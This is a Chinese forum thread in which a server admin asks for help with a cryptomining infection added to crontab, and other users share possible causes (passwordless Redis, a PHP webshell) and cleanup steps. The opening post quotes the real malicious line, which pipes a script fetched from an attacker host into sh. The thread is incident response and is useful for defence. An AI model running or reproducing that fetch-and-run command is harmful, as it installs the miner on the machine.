首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
guanhui07
V2EX  ›  Linux

求助,服务器 crontab 被人异常加入挖矿脚本

  •  
  •   guanhui07 · 303 天前 · 2711 次点击
    这是一个创建于 303 天前的主题,其中的信息可能已经有所发展或是发生改变。

    线上服务器 crontab 被人异常加入挖矿脚本 添加的脚本如下:

    */6 * * * * curl -fsSL http://w.3ei.xyz:43768/init.sh | sh > /dev/null 2>&1 
    

    服务器 阿里云 ceontos7 8 核心 8g 内存

    环境 openresty/1.13.6.2 mysql5.7 php7.2.6 redis rabbitmq

    ssh 修改了 35523 端口,禁止了 root 登录,但开了几个账号公司员工登录,密码足够复杂,

    过程如上..还没解决 ,有遇到的留言 讨论下 ,哪里漏洞 解决方法,谢谢

    23 回复  |  直到 2019-05-17 11:27:53 +08:00
    CallMeReznov
        1
    CallMeReznov   303 天前   ♥ 2
    我以为直接重装的我都够消极了
    没想到还有直接改 HOST 的

    大佬毕竟是大佬
    aulia
        2
    aulia   303 天前 via Android
    你们机器上是不是有个空密码的 redis 在跑?
    Tink
        3
    Tink   303 天前 via iPhone
    注释了就行
    BigPig666
        4
    BigPig666   303 天前
    又不是不能用。。。
    guanhui07
        5
    guanhui07   303 天前
    @aulia 是 但 redis 端口没开放给对外 ,bind 127.0.0.1
    zsy979
        6
    zsy979   303 天前
    昨天刚发现测试环境跑了个 xmrig。。。 又不是不能用
    pmispig
        7
    pmispig   303 天前
    估计 php 有漏洞被渗透获取了 webshell,你先检查下有没有奇怪的 php 文件
    d0m2o08
        8
    d0m2o08   303 天前
    把 curl 和 wget 删掉,又不是不能用
    qsmy
        9
    qsmy   303 天前
    还真不能用,一般都是挖门罗币,CPU 给你占满。redis 没设密码。被黑进服务器执行木马代码。定时还关不掉。高级的不止改 cron,还有伪造系统进程 httpdns、篡改系统文件 libntp.so 全程守护。
    wzaqqq
        10
    wzaqqq   303 天前
    遇到过类似的,把常用命令感染了,比对下 ss netstat top 之类的二进制的时间,不放心就一个个换。
    qsmy
        11
    qsmy   303 天前
    曾经分析过,感觉挺暴利的。原理还简单,利用 redis 无密码的越权漏洞,还写个 Python 扫局域网里有相同漏洞的机子。
    miyuki
        12
    miyuki   303 天前 via Android
    redis 公网?
    miyuki
        13
    miyuki   303 天前 via Android
    @miyuki 没仔细看,我瞎了

    建议重装吧
    viruser
        14
    viruser   303 天前 via Android
    草(日本语),这玩意连 debug_info 都没删,那专杀脚本快出了,如果着急联系下搞安全的公司
    viruser
        15
    viruser   303 天前 via Android
    我不是专业的人员,所以下面内容我也不知道有没有作用...这个软件总体原理和之前的几个挖矿软件类似,修改 crontab,修改 rm,拷贝挖矿本体,看看能不能用之前的脚本删除 crontab 里的内容,然后用 busybox rm 删除 /etc/pvds /etc/httpdz /etc/migrations 还有 /etc/init.d/ats, 检查 chkconfig, 最后检查下 /tmp 下的文件。最好在 /etc/hosts 里加上 127.0.0.1 w.3ei.xyz 127.0.0.1 w.21-3n.xyz 。
    glasslion
        16
    glasslion   303 天前
    @guanhui07 是用的阿里云的专有网络还是经典网络?
    libook
        17
    libook   303 天前
    Rootkit ?

    这个得亲自上机诊断才知道怎么解决吧,可以花钱找安全公司,不过有可能会比较贵。
    要是机器上没有业务数据或可以安全备份业务数据,可能重装重新部署会更快更有效。
    SSH 禁用密码只允许秘钥方式登录,然后所有服务都以非 root 最小权限方式运行,也可以考虑用容器直接隔离。
    rootww21
        18
    rootww21   289 天前
    以前碰到过 redis 无密码 挖矿程序跑满
    tzwsoho
        19
    tzwsoho   257 天前
    CentOS 6.9 Final 同样中毒,症状是 wloq 进程 CPU 100%。。
    我的处理是先把 /bin/sh 改名成 /bin/sh_ex,然后 /etc/hosts 加入
    127.0.0.1 w.3ei.xyz
    127.0.0.1 w.21-3n.xyz
    以上两步可以禁止脚本继续执行
    kill -9 `pidof httpdz`
    kill -9 `pidof migrations`
    kill -9 `pidof pvds`
    kill -9 `pidof wloq`
    kill -9 `pidof initdz`
    chattr -i /etc/httpdz /etc/wloq /etc/initdz /etc/pvds /etc/migrations
    rm -f /etc/httpdz /etc/migrations /etc/pvds /etc/initdz /etc/wloq
    然后
    chattr -i /var/spool/cron/root
    chmod a+s /var/spool/cron/root
    vi /var/spool/cron/root
    :%d
    :wq
    清空计划任务
    chattr -i ~/.ssh/authorized_keys
    chmod a+s ~/.ssh/authorized_keys
    vi ~/.ssh/autorized_keys
    在带有 [email protected] 的那一行按 dd 删掉
    :wq
    这样基本就把挖矿病毒清理完了
    tzwsoho
        20
    tzwsoho   257 天前
    另外我遇到的病毒还会在硬盘上所有 jquery*.js 的末尾加上一行代码
    find / -name 'jquery*.js'
    找出硬盘上所有相关文件,然后删掉这行代码
    baoshuai33
        21
    baoshuai33   255 天前
    @tzwsoho rm 命令被替换了, 源文件被替换成了 rmm

    \mv /usr/bin/rmm /usr/bin/rm
    \mv /usr/bin/sh_ex /usr/bin/sh
    baoshuai33
        22
    baoshuai33   255 天前
    @tzwsoho 根据这篇文章来看 https://www.anquanke.com/post/id/175725 还增加了个开机自启动脚本 ats :/etc/rc.d/init.d/ats
    vipdog73
        23
    vipdog73   245 天前
    原本的 rm 命令被换成了 rmm。记得删掉 rmm -rf /usr/bin/rm 然后 mv /usr/bin/rmm /usr/bin/rm,如果删不掉记得看下权限。lsattr 看下是不是加了 ia 权限
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   1100 人在线   最高记录 5168   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.3 · 31ms · UTC 19:39 · PVG 03:39 · LAX 11:39 · JFK 14:39
    ♥ Do have faith in what you're doing.